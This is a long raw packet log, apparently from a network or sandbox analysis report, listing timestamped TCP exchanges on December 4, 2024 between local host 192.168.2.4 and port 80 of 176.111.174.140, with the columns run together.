                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.042675018 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.042790890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.042860985 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.043792963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.043863058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.044895887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.044974089 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.045007944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.045063972 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.046026945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.046097994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.046228886 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.047178984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.047269106 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.047329903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.048268080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.048322916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.049472094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.049549103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.049551964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.049614906 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.050637960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.050658941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.050748110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.051724911 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.051817894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.051866055 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.052773952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.052896976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.053560019 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.053884029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.054035902 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.054162979 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.055057049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.055068970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.055233002 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.056090117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.056175947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.057250023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.057310104 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.057373047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.057430029 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.058383942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.058542013 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.058634043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.059457064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.059585094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.060595036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.060676098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.060720921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.060722113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.061728001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.061850071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.062635899 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.062886953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.063031912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.063999891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.064100027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.064115047 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.064155102 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.065249920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.065319061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.066221952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.066281080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.066350937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.066401005 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.067357063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.067420959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.067477942 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.068459988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.068732023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.069539070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.069628954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.069637060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.069678068 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.070681095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.070806980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.071121931 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.072005987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.072271109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.072360039 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.073014021 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.073065042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.073167086 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.074044943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.074148893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.074240923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.075186014 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.075289011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.075391054 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.076258898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.076426029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.076514006 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.077394962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.077557087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.077652931 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.078521967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.078603029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.078737974 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.079732895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.079832077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.080044031 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.080885887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.080945015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.081175089 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.081937075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.082165956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.082262993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.083081007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.083200932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.083296061 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.084172964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.084389925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.085345984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.085443974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.085444927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.085500002 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.086371899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.086443901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.086625099 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.087495089 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.087682009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.088571072 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.088627100 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.088668108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.088711023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.089704037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.089863062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.090620995 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.090856075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.091006041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.091993093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.092036963 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.092106104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.092170954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.093138933 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.135390997 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.227194071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.227292061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.227451086 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.227658033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.227741003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.227787971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.228734016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.228871107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.229783058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.229826927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.229896069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.229938030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.230921984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.231089115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.231132030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.232368946 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.232475042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.233206987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.233256102 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.233316898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.233359098 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.234621048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.234847069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.234958887 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.235414982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.235567093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.235622883 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.236565113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.236676931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.237641096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.237685919 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.237731934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.237773895 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.238780022 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.238871098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.238917112 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.239924908 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.240087986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.241020918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.241063118 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.241131067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.241174936 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.242235899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.242372036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.242624044 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.243222952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.243366003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.244405985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.244477034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.244517088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.244560003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.245498896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.245646954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.246613979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.246670961 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.246701002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.246745110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.247741938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.247869015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.248790979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.248842001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.248892069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.248929024 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.249989986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.250134945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.250613928 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.251100063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.251220942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.252270937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.252315044 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.252396107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.252438068 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.253300905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.253423929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.254482031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.254520893 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.254525900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.254570007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.255556107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.255748034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.255795956 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.256675959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.256759882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.256887913 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.257776976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.257896900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.257946014 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.259030104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.259416103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.259474993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.260045052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.260122061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.260682106 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.261699915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.261831045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.261926889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.262249947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.262387037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.262469053 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.263400078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.263529062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.263710976 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.264657974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.264787912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.264892101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.265645981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.265763044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.265845060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.266830921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.266890049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.266972065 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.267852068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.267925024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.268202066 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.269042015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.269097090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.269207954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.270121098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.270342112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.270422935 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.271332979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.271450043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.271536112 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.272397995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.272676945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.273453951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.273544073 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.273580074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.273621082 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.274552107 CET8049738176.111.174.140192.168.2.4
